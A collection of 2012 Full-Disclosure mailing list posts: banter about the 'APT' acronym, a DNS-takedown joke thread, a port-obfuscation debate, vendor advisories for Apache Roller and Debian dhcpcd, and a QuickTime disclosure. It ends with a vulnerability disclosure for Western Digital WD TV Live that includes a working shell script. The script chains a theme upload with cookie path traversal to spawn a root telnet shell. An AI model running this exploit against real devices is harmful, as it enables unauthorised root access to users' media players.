Re: [Full-disclosure] Warning is about APT

[rancor]

You know that was not for real, just someone making fun of one of the
characters on the list.

Don't waste your time
On Jun 25, 2012 9:09 PM, "c-APT-ure"  wrote:

> Hi mustntlive
>
> could you maybe try a better translation service so that it's easier to
> understand the meaning of your messages? (I assume this is automated
> translation from your native language)
>
> thanks however for this great site about APT. it's really great !! (i'm
> not just saying this because i live in .ch)
>
> finally someone talks "About APT" and "Who We Are"
>
> http://www.apt.ch/index.php?option=com_k2&view=item&layout=item&id=666&Itemid=41&lang=en
> (notice the "id = 666" there in the url !? coincidence?)
>
> "The APT seeks to achieve this vision through a preventive and cooperative
> approach. The APT works globally, regionally and nationally with a wide
> range of partners including State authorities, national institutions and
> civil society [a.k.a. Hackers]."
>
> "The APT is convinced that the prevention of [...] is best achieved
> through three integrated elements:
>
>- Promoting *effective monitoring and transparency* [...]
>- Contributing to effective international and national *[...]
>frameworks* [...]
>- Ensuring that *international and national actors* have the necessary
>*determination and capacity* [...]"
>
> "The APT has been leading the international campaign [...] (OPCAT)."
>
> "The APT’s multi-disciplinary and multi-cultural team has expertise in
> training, providing legal advice, developing practical tools, facilitating
> exchanges and advocating for preventive measures and mechanisms."
>
> "The APT develops and disseminates practical tools to [...]"
>
> "*The APT works in cooperation with a relatively broad variety of
> partners, who share its objectives, such as state authorities, police
> services, [...]*"
>
> * they name the Regions in which the APT is active. [really? all
> continents?]
> * under "Publications & Tools" they publish "The Optional Protocol - A
> Manual for 
> Prevention
> "
>
> though the claim on the main page might not be true anymore:
>
> *'No one knows about us'
>
> *well, at least they are not legion and we don't need to expect them like
> some other group(s) (they are already here, or not?)
>
>
> it's all about the context you read it in :-)
>
> i didn't know there is more than one definition for the APT ("the proper
> noun").
>
> cheers,
> @c_APT_ure
>
>
> On Fri, Jun 22, 2012 at 8:05 PM, Григорий Братислава 
> wrote:
>
>> Hello full disclosure!! !! !!
>>
>> Is like to warn you about APT. APT is mean Association for is
>> Prevention of is Torture. http://www.apt.ch
>>
>> Is musntlive receive email from APT is say to stop using their name
>> for mean malware from China.
>>
>> Is musntlive's best interest to believe is this APT overflow is come
>> from Richard Bejtlich of Taosecurity and Mandiant.
>>
>> Please Richard, is stop say APT so much. If is you must say give space
>> between China and is APT. Everything is not China!! Thank you. Is say
>> hi to Amy
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[rancor]

I like this thread =) kind of the surf'aholic disaster plan for idiots and
it's amusing in its own sad way
On Jun 25, 2012 9:52 PM,  wrote:

> > Do you know? Even in DNS take down you can youcan access your favourite
> > sites.
> >
> > People may think that in DNS shoutdown they can lost access to their
> > addicted websites.
> >
> >
> > But after reading this article you will know how easily you can access
> > your websites. You can access them by typing their IP address in your
> > web-browser.
> >
> > Copy the IP addresses given below:
> >
> > tumblr.com 174.121.194.34
> > wikipedia.org 208.80.152.201
>
> Is this post some kind of joke? Anyone who have played even a bit with web
> servers know this. In the event of DNS takedown your site is pretty much
> done. I don't think so regular visitors track down site IP's and visit it
> again when it 'disappears' ...
>
> >
> > Original
> > Article:
> http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[nix]

> Do you know? Even in DNS take down you can youcan access your favourite
> sites.
>
> People may think that in DNS shoutdown they can lost access to their
> addicted websites.
>
>
> But after reading this article you will know how easily you can access
> your websites. You can access them by typing their IP address in your
> web-browser.
>
> Copy the IP addresses given below:
>
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201

Is this post some kind of joke? Anyone who have played even a bit with web
servers know this. In the event of DNS takedown your site is pretty much
done. I don't think so regular visitors track down site IP's and visit it
again when it 'disappears' ...

>
> Original
> Article:http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[Thor (Hammer of God)]

What, no one uses the HOSTS file anymore?

[Description: Description: Description: Description: Description: Description: 
Description: Description: Description: TimSig]

Timothy "Thor"  Mullen
www.hammerofgod.com
Thor's Microsoft Security 
Bible


From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Nate Theis
Sent: Monday, June 25, 2012 12:28 PM
To: jweyr...@gmail.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] How to access your favorite sites in the event 
of a DNS takedown ?


And don't forget

lists.grok.org.uk 127.0.0.1
On Jun 25, 2012 11:15 AM, "Jardel" 
mailto:jweyr...@gmail.com>> wrote:
Do you know? Even in DNS take down you can youcan access your favourite sites.

People may think that in DNS shoutdown they can lost access to their addicted 
websites.


But after reading this article you will know how easily you can access your 
websites. You can access them by typing their IP address in your web-browser.

Copy the IP addresses given below:

tumblr.com 174.121.194.34
wikipedia.org 208.80.152.201

Original 
Article:http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
<>___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] server security

[Thor (Hammer of God)]

Well, even if they are trying to get into your network specifically, you make 
them do more work.  They have to scan *and* identify the services.  The more 
scanning, fingerprinting, posting, peeking and poking they do (see what I did 
there? :) ) the louder they are and the more likely the attack is to be 
detected.  

This particular subject continues to come up, and there continues to be debate 
about the value, but I actually don't see how it can't be viewed as a security 
control, albeit a relatively trivial one to bypass.  Security in depth works. 

Timothy "Thor"  Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Daniel Hadfield
Sent: Thursday, June 21, 2012 12:49 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] server security

It depends what the attackers motive is. Is he/she trying to get as many 
machines infected as he/she can. Or is he/she trying to get into YOUR network.

My 2c

On 21/06/2012 20:20, Thor (Hammer of God) wrote:
> I completely agree with Gage.  The way I see it, security through obscurity 
> is perfectly valid as long as the control remains obscured.  I think the 
> "anyone can just scan your ports" is somewhat specious in that most (if not 
> something like 99% or so (unqualified opinion of course)) traffic is simply 
> noise and scans for standard ports.  This is particularly true when it 
> matters most: during a worm outbreak or a newly published vulnerability.  
> Attackers simply don't have the time nor the inclination to go through and 
> perform slow and loud scans when they can quickly move on to the next target. 
>  If 90% of the targets have services on the default ports, then it makes far 
> more sense to just go after the easily targets.  
>
> Perfect case-in-point is the recent RDP unpleasantness.   Non-standard port 
> deployments were automatically removed from the target scans for 3389.  I 
> don't see how any can argue against the security value of such a 
> configuration.
>
> t
>
>
>
> Timothy "Thor"  Mullen
> www.hammerofgod.com
> Thor's Microsoft Security Bible
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Gage Bystrom
> Sent: Thursday, June 21, 2012 9:25 AM
> To: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] server security
>
> Well thats a bit of an iffy one. I'd say it IS a security measure, albeit one 
> that is solely effective if and only if compounded with other measures.
>
> It's unlikely, but you never know, you just might miss out on a nasty worm 
> all because you werent running on a  default port one day.
>
> On Thu, Jun 21, 2012 at 8:52 AM, Rob  wrote:
>> We need to make a distinction between security and obscurity here. The only 
>> time changing ports actually hardens a service in any way is when the port 
>> requires elevated rights to bind, changing to 1025 for example removes the 
>> root requirement. Any actual or theoretical vulnerabilities still exist. If 
>> somebody is looking at your server, they'll find the port without much 
>> trouble. Alternate ports can remove junk traffic from logs, so there is a 
>> benefit, if not entirely a security one.
>>
>> Rob
>>
>>
>> Sent on the Sprint® Now Network from my BlackBerry®
>>
>> -Original Message-
>> From: Alex Dolan 
>> Sender: listbou...@securityfocus.com
>> Date: Thu, 21 Jun 2012 07:44:57
>> To: Littlefield, Tyler
>> Cc: 
>> Subject: Re: server security
>>
>> One tip I have is to set SSH to a port other than 22, I don't need to 
>> tell anyone how devastating it is if someone did actually get access 
>> to that service. Putting it on some other port reduces your risk
>>
>> On Thu, Jun 21, 2012 at 1:27 AM, Littlefield, Tyler  
>> wrote:
>>> Hello:
>>> I have a couple questions. First, I'll explain what I did:
>>> I set up iptables and removed all unwanted services. Iptables blocks 
>>> everything, then only opens what it wants. I also use the addrtype 
>>> module to limit broadcast and unspec addresses, etc. I also do some 
>>> malformed packet work where I just drop everything that looks 
>>> malformed (mainly by the flags).
>>> 2) I secured ssh: blocked root logins, set it up so only users in the 
>>> sshusers group can connect, and set it only to allow ppk.
>>> 3) I installed aid.
>>> 4) disabled malformed packets and forwarding/etc in sysctl.
>>> This is a basic web server that runs email, web and a couple other things.
>>> It's only running on a linode512, so I don't have the ability to set 
>>> up a ton of stuff; I also think that would make things more of a 
>>> mess. What else would be recommended?
>>> Also, I'm looking to add something to the web server; sometimes I 
>>> notice that there are a lot of requests from people scanning for 
>>> common urls like wordpress/phpbb3/etc,

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[Nate Theis]

And don't forget

lists.grok.org.uk 127.0.0.1
On Jun 25, 2012 11:15 AM, "Jardel"  wrote:

> Do you know? Even in DNS take down you can youcan access your favourite
> sites.
>
> People may think that in DNS shoutdown they can lost access to their
> addicted websites.
>
>
> But after reading this article you will know how easily you can access
> your websites. You can access them by typing their IP address in your
> web-browser.
>
> Copy the IP addresses given below:
>
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201
>
> Original Article:
> http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[Peter Dawson]

quick quick nuke the co-ord [ 49°28'14" North | 16°56'48" East ]


On Mon, Jun 25, 2012 at 2:49 PM, Jardel Weyrich  wrote:

> And you're trying to impersonate someone by using my email address as
> sender? I don't get it.
>
> Received: from emkei.cz (emkei.cz [46.167.245.118])
>by lists.grok.org.uk (Postfix) with ESMTP id BBB2CCB
>for ;
>Mon, 25 Jun 2012 19:14:27 +0100 (BST)
> Received: by emkei.cz (Postfix, from userid 33)
>id BC04FD58DA; Mon, 25 Jun 2012 20:06:43 +0200 (CEST)
> To: full-disclosure@lists.grok.org.uk
> From: "Jardel" 
>
> -- jardel
>
> On Mon, Jun 25, 2012 at 3:06 PM, Jardel  wrote:
> > Do you know? Even in DNS take down you can youcan access your favourite
> sites.
> >
> > People may think that in DNS shoutdown they can lost access to their
> addicted websites.
> >
> >
> > But after reading this article you will know how easily you can access
> your websites. You can access them by typing their IP address in your
> web-browser.
> >
> > Copy the IP addresses given below:
> >
> > tumblr.com 174.121.194.34
> > wikipedia.org 208.80.152.201
> >
> > Original Article:
> http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Entropy distribution to virtual machines

[coderman]

On Mon, Jun 25, 2012 at 12:21 AM, BMF  wrote:
> ...
> I have a server with one of these in it:
>
> http://www.entropykey.co.uk/
>
> although I still need to find a reasonably secure way to share the
> entropy with all of my VMs where it is really needed.

check out http://www.vanheusden.com/entropybroker/ or virtio-rng.
i haven't used either; does anyone have positive experiences?

for now, roll my own: pass entropy into guest kernel command line
which is mixed into guest pool during init, then entropy distribution
from host to guest egd's via tcp once networking is up.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[nake]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Is that so? As far as I know if the host has multiple websites you
need more info than just the IP. For example, my webpage
(nakerium.com) is in a shared hosting.
If I ping it it says that its IP is: 159.253.149.218
However, if I just enter that IP in my browser it just shows a random
page from my host because the server doesn't know what webpage I want
to see.
In order to see my webpage I need to enter
http://159.253.149.218/~nakerium

Most of the times it should be straightforward to add the
"/~websitename" but it depend on how the host has defined their server.

On 25/06/2012 20:06, Jardel wrote:
> Do you know? Even in DNS take down you can youcan access your 
> favourite sites.
> 
> People may think that in DNS shoutdown they can lost access to 
> their addicted websites.
> 
> 
> But after reading this article you will know how easily you can 
> access your websites. You can access them by typing their IP 
> address in your web-browser.
> 
> Copy the IP addresses given below:
> 
> tumblr.com 174.121.194.34 wikipedia.org 208.80.152.201
> 
> Original 
> Article:http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
>
>
>
> 
___ Full-Disclosure -
> We believe in it. Charter: 
> http://lists.grok.org.uk/full-disclosure-charter.html Hosted and 
> sponsored by Secunia - http://secunia.com/
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.17 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBAgAGBQJP6K+vAAoJECW/Xejma6MSc/4H/RTeLLYdfJPglTOQLKjeO/Hj
UJPTMv3hNql0jbRbWnBQlf6qT+BYPKEZ0P8F9TKWwd9kptoS/1MegT8I0lo4maj1
sDi937rGiEkIxPpwrrkUCY8mwSG9DGZqfFEGhfQQB9z7GMOB8p54KdNn61cacw4S
MAUPsViFFGwgSQoKXalmbh/lAfWqLtygjuBD0uAaZ+NKh7kO8NjwVIhOFMz0G4DI
1PN9U5fWYZsssbm+5ngXm1n1Tsa8EW6pbkBY2yoVcOkVHyUuNTCHArTWsK+4MvaD
ugHrM/DwykNKZ5njtWwld0uAV2KTeLLNEcY5vSv03tRYZu6zd8bTIK6iXoYSids=
=sbTe
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CVE-2012-2381: Apache Roller Cross-Site-Scripting (XSS) vulnerability

[Dave]

Severity: important

Vendor: The Apache Software Foundation

Versions Affected:
Roller 4.0.0 to Roller 4.0.1
Roller 5.0
The unsupported Roller 3.1 release is also affected

Description:
Roller trusts bloggers to post HTML and JavaScript code in the weblog
and for some sites this can be a problem because users are untrusted
and could post malicious code and exploit XSS. This issue has be
addressed by added a new configiration property weblogAdminsUntrusted
flag that, when set to 'true' will cause all weblog content to be HTML
sanitized.

Mitigation
Roller 4.0 and 4.0.1 users should upgrade to Roller 5.0.1
Roller 5.0 users should upgrade to Roller 5.0.1
Roller 3.1 users should upgrade to Roller 5.0.1

Credit:
This issue was discovered by Jun Zhu, PhD student, University of North
Carolina, Charlotte

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] CVE-2012-2380: Apache Roller Cross-Site-Resource-Forgery (XSRF) vulnerability

[Dave]

Severity: important

Vendor: The Apache Software Foundation

Versions Affected:
Roller 4.0.0 to Roller 4.0.1
Roller 5.0
The unsupported Roller 3.1 release is also affected

Description:
HTTP POST interfaces in the Roller admin/editor console were not
protected from CSRF attacks. This issue has been fixed by requiring a
valid per user and per session "salt" value in all HTTP POST requests.

Mitigation
Roller 4.0 and 4.0.1 users should upgrade to Roller 5.0.1
Roller 5.0 users should upgrade to Roller 5.0.1
Roller 3.1 users should upgrade to Roller 5.0.1

Credit:
This issue was discovered by Jun Zhu, PhD student, University of North
Carolina, Charlotte

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Warning is about APT

[c-APT-ure]

Hi mustntlive

could you maybe try a better translation service so that it's easier to
understand the meaning of your messages? (I assume this is automated
translation from your native language)

thanks however for this great site about APT. it's really great !! (i'm not
just saying this because i live in .ch)

finally someone talks "About APT" and "Who We Are"
http://www.apt.ch/index.php?option=com_k2&view=item&layout=item&id=666&Itemid=41&lang=en
(notice the "id = 666" there in the url !? coincidence?)

"The APT seeks to achieve this vision through a preventive and cooperative
approach. The APT works globally, regionally and nationally with a wide
range of partners including State authorities, national institutions and
civil society [a.k.a. Hackers]."

"The APT is convinced that the prevention of [...] is best achieved through
three integrated elements:

   - Promoting *effective monitoring and transparency* [...]
   - Contributing to effective international and national *[...]
frameworks*[...]
   - Ensuring that *international and national actors* have the
necessary *determination
   and capacity* [...]"

"The APT has been leading the international campaign [...] (OPCAT)."

"The APT’s multi-disciplinary and multi-cultural team has expertise in
training, providing legal advice, developing practical tools, facilitating
exchanges and advocating for preventive measures and mechanisms."

"The APT develops and disseminates practical tools to [...]"

"*The APT works in cooperation with a relatively broad variety of partners,
who share its objectives, such as state authorities, police services, [...]*
"

* they name the Regions in which the APT is active. [really? all
continents?]
* under "Publications & Tools" they publish "The Optional Protocol - A
Manual for 
Prevention
"

though the claim on the main page might not be true anymore:

*'No one knows about us'

*well, at least they are not legion and we don't need to expect them like
some other group(s) (they are already here, or not?)


it's all about the context you read it in :-)

i didn't know there is more than one definition for the APT ("the proper
noun").

cheers,
@c_APT_ure


On Fri, Jun 22, 2012 at 8:05 PM, Григорий Братислава wrote:

> Hello full disclosure!! !! !!
>
> Is like to warn you about APT. APT is mean Association for is
> Prevention of is Torture. http://www.apt.ch
>
> Is musntlive receive email from APT is say to stop using their name
> for mean malware from China.
>
> Is musntlive's best interest to believe is this APT overflow is come
> from Richard Bejtlich of Taosecurity and Mandiant.
>
> Please Richard, is stop say APT so much. If is you must say give space
> between China and is APT. Everything is not China!! Thank you. Is say
> hi to Amy
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Sunday Fodder

[Darius Jahandarie]

On Sun, Jun 24, 2012 at 4:06 PM, Thor (Hammer of God)
 wrote:
> For the FB’ers out there, the “Hacker News” (arguably accurate) has posted
> an incendiary photo alleging US soldier posing with the dead and supposedly
> engaged in “The Ichabod.”  The funny part of it is to go through and count
> the number of posts that threaten the lives of Americans; each one of these
> poor sods’ accounts are going to have their full history dumped, stored, and
> analyzed.

Hey, if the US government realizes this sort of pre-attack
investigation stuff works better than their security theater at the
airports, maybe my day-to-day life will improve.


--
Darius Jahandarie

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Exploit for Intel SYSRET "vulnerability" on FreeBSD

[Hunger]

https://www.youtube.com/watch?v=1UeJXokbja0

Exploit release coming soon... ;-)

Cheers,

Hunger

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How to access your favorite sites in the event of a DNS takedown ?

[Jardel Weyrich]

And you're trying to impersonate someone by using my email address as
sender? I don't get it.

Received: from emkei.cz (emkei.cz [46.167.245.118])
by lists.grok.org.uk (Postfix) with ESMTP id BBB2CCB
for ;
Mon, 25 Jun 2012 19:14:27 +0100 (BST)
Received: by emkei.cz (Postfix, from userid 33)
id BC04FD58DA; Mon, 25 Jun 2012 20:06:43 +0200 (CEST)
To: full-disclosure@lists.grok.org.uk
From: "Jardel" 

-- jardel

On Mon, Jun 25, 2012 at 3:06 PM, Jardel  wrote:
> Do you know? Even in DNS take down you can youcan access your favourite sites.
>
> People may think that in DNS shoutdown they can lost access to their addicted 
> websites.
>
>
> But after reading this article you will know how easily you can access your 
> websites. You can access them by typing their IP address in your web-browser.
>
> Copy the IP addresses given below:
>
> tumblr.com 174.121.194.34
> wikipedia.org 208.80.152.201
>
> Original 
> Article:http://cybermughal.blogspot.com/2012/06/how-to-access-your-favorite-sites-in.html
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SE-2012-01] Security weakness in Apple QuickTime Java extensions (details released)

[Security Explorations]

Hello All,

Security Explorations decided to release technical details and accompanying
Proof of Concept code for a security vulnerability in Apple QuickTime 
software.
This move is made in a response to Apple's evaluation of a reported issue as
a "hardening issue" rather than a security bug [1].

Security Explorations does not agree with the results of Apple's evaluation.
It does not support the approach of a "silent fix" either [2].

A vulnerability that was reported to the company on Apr 12, 2012 allows to
bypass two security checks in Apple's code. That vulnerability (Issue 22)
leads to a serious violation of Java VM security. When combined with Issue
15 affecting Oracle's Java SE [3], it can lead to a complete compromise of
a Java VM environment on a fully patched Windows OS with latest Java SE
(1.6.0_33-b03) and Apple QuickTime (7.72.80.56) software installed.

The case of an attack against Apple QuickTime software illustrates a common
trend in attacks against technologies such as Java VM where more than one,
partial security bypass issue usually needs to be combined together to 
achieve
a complete security compromise. The more surprising it is to see a vendor's
response downplaying the importance of the issue found in its code that can
actually contribute to the full blown attack against the users of its 
software.

Security Explorations is publishing the following materials in a hope that a
wider public could conduct an independent evaluation of Apple QuickTime 
issue
and deliver an unbiased judgment of both companies claims:
- Short write-up presenting vulnerability details, its impact and a summary
   of vendor's response,
- Proof of Concept code for Issue 22.

Download links for the above-mentioned materials are provided below:

http://www.security-explorations.com/materials/se-2012-01-22.pdf
http://www.security-explorations.com/materials/se-2012-01-22.zip

Thank you.

Best Regards,
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
-

References
[1] SE-2012-01 Vendors status
 http://www.securityexplorations.com/en/SE-2012-01-status.html
[2] About the security content of Java for OS X 2012-004 and Java for 
Mac OS X 10.6 Update 9
 http://support.apple.com/kb/HT5319
[3] SE-2012-01 Project, Security Vulnerabilities in Java SE
 http://www.securityexplorations.com/en/SE-2012-01-press.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2498-1] dhcpcd security update

[Yves-Alexis Perez]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512


- -
Debian Security Advisory DSA-2498-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
June 23, 2012  http://www.debian.org/security/faq
- -

Package: dhcpcd
Vulnerability  : remote stack overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-2152
Debian Bug : #671265

It was discovered that dhcpcd, a DHCP client, was vulnerable to a stack
overflow. A malformed DHCP message could crash the client, causing a denial of
service, and potentially remote code execution through properly designed
malicous DHCP packets.

For the stable distribution (squeeze), this problem has been fixed in
version 1:3.2.3-5+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in
version 1:3.2.3-11.

For the unstable distribution (sid), this problem has been fixed in
version 1:3.2.3-11.

We recommend that you upgrade your dhcpcd package.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCgAGBQJP52AwAAoJEDBVD3hx7wuoCkcQANmkWRLHyxzRfYFcnYmv137e
1mTjyDavnytTXiRA1x3cDsS9kZMgO/NUFDfCP6tTVqB3tYnwFdP4pr8eaqj2CIQD
WLCVFd3BcGXeWni959gY5KEr/F7te5z1HawbZJrDzTv3jOUJB5mP5kfPpwN2Cx8F
Zv0DzO7lxb6ogbEzQOY8GV47CDQov8msBSPiaKSgTbamKh9i7FXvfOgDaY8xAB4+
GLAvgPzXe9Mvz6vVjt//pHlqOtJXBBn4IPf3ESJO2Pk9KEHlEInCxXUuak4w7kGn
yN4Ao40YwgpZDvN8HvXDeOwlAtYaZSFKXQT190aL+ZgVmBEGr+dhTDEoFkBrILXT
lB64mIEOaM+xrIlr03k0pdhGrldvnkYnmOAppRkhtK8di1ElidLMiGUrNGJ/jD9Y
YC28h3K/TVUY5veQaR9raGVu5/NOguDcwNbi+REB1ZYVVvB6Fd2FX1LJvqV06w/q
OJqr7OfyUb1rbxZQG1VD/tLKJQI9UmNovj910t9ne6Vjbv5rAt7WCmLSdKMjvhcR
B2Ke0ptetb8+wWpm295B7i03jtL6URm/ILxtwTbLzMIK7CRw2ABbuDjpE8uYL52V
9utjelsq29PqrWuf1KeawcPd3IK8FyTNIwj/wls8H+LiCfy78WOmUQmLsIeHU9G9
O59HjbsoUZzQ+RTkoTcx
=iUQH
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Root Exploit Western Digital's WD TV Live SMP/Hub (all released firmware releases)

[Wolf Bee]

Introduction

The WD TV Live Streaming Media Player is a consumer device to play 
various audio and video formats.
Additionally it allows access to multiple video streaming services like 
Netflix, Hulu or Youtube.[1]
The device allows customization of its user interface and limited remote 
administration using a web interface.

The LIVE SMP is running a customized Linux kernel and userland.
Parts of the firmware are released under the terms of the GNU General 
Public License.
Proprietary binaries are included in encrypted parts of the firmware 
which are decrypted during runtime.

1. Affected Versions

The analysed firmware is the latest version (1.07.15 as of 03/2012) as 
published on [2], prior versions are vulnerable too.
Large portions of the firmware are shared with the WDTV Live Hub[3] thus 
the presented findings are applyable on this device with minor changes 
as described later.

2. Attack Vector

The attack vector used to gain root access on the device involves two 
implementation flaws as described in the following sections.

2.1. User Input Validation Flaws

The web interface is written using the PHP language.
Several files contain user input validation flaws similar to the one 
described here.
Cookie header values in /opt/webserver/htdocs/index.php are not 
validated at all.
The provided cookie value is used within an include statement allowing 
the attacker to force inclusion of arbitrary files (as long as they are 
named home.php).

2.2. Possibility to Upload Arbitrary Files
--
To allow the customization of the user interface one may upload theme 
files (zip archives) through the web interface.
The contents of these archives are not restricted so adding a file named 
home.php is possible.

2.3. Limitations

Most of the PHP files of the web interface include security.php which 
limits access to the networks IP/subnet mask combination the LIVE SMP is 
connected to.
Aformended index.php is guarded by this security measure but uploading 
theme file using upload.php is possible from any IP address.

3. Proof of Concept
---
The following script will spawn a telnet daemon providing access to a 
root shell on the device.
(needs zip and curl binaries)

#!/bin/sh
THEME_NAME="blub"

if [ $# != 1 ]; then
  TARGET="orpheus"
  echo "Root Exploit for WDTV Live SMP\n\nUsing default 
target=${TARGET}\nUSAGE: $0 \n\n"
else
  TARGET=$1
fi

if [ ! -f "home.php" ]; then
  echo ' home.php
fi

if [ ! -f "${THEME_NAME}.zip" ]; then
  touch meta.xml
  zip ${THEME_NAME} home.php meta.xml
fi

echo "Uploading ${THEME_NAME}.zip:"
curl -F appearance=@${THEME_NAME}.zip -o /dev/null \
  http://${TARGET}/upload.php

echo "\n\nRunning payload:"
curl --cookie "language=../../../../usrdata/.wd_tv/theme/${THEME_NAME}" \
  http://${TARGET}/index.php

4. Adaption for the Live Hub

As the LIVE HUB does not have the ability to upload themes through the 
web interface, one needs to use a different angle to upload the payload:
Using the samba share WDTVLiveHub. Thus the language cookie has to be 
adapted as shown here:

curl --cookie "language=../../../../mediaitems/Local/WDTVLiveHub/" \
  http://${TARGET}/index.php

5. Code, Whitepaper, Example Session, References

Code, whitepaper, example session: http://hammerhead.shark23.de

[1] Western Digital. WD TV Live, .
URL http://wdc.com/en/products/products.aspx?id=330.
[2] Western Digital. Downloads WD TV Live Streaming Media Player (Gen 
3), 2012.
URL 
http://support.wdc.com/product/download.asp?groupid=1011&sid=161&lang=en.
[3] Western Digital. WD TV Live Hub, .
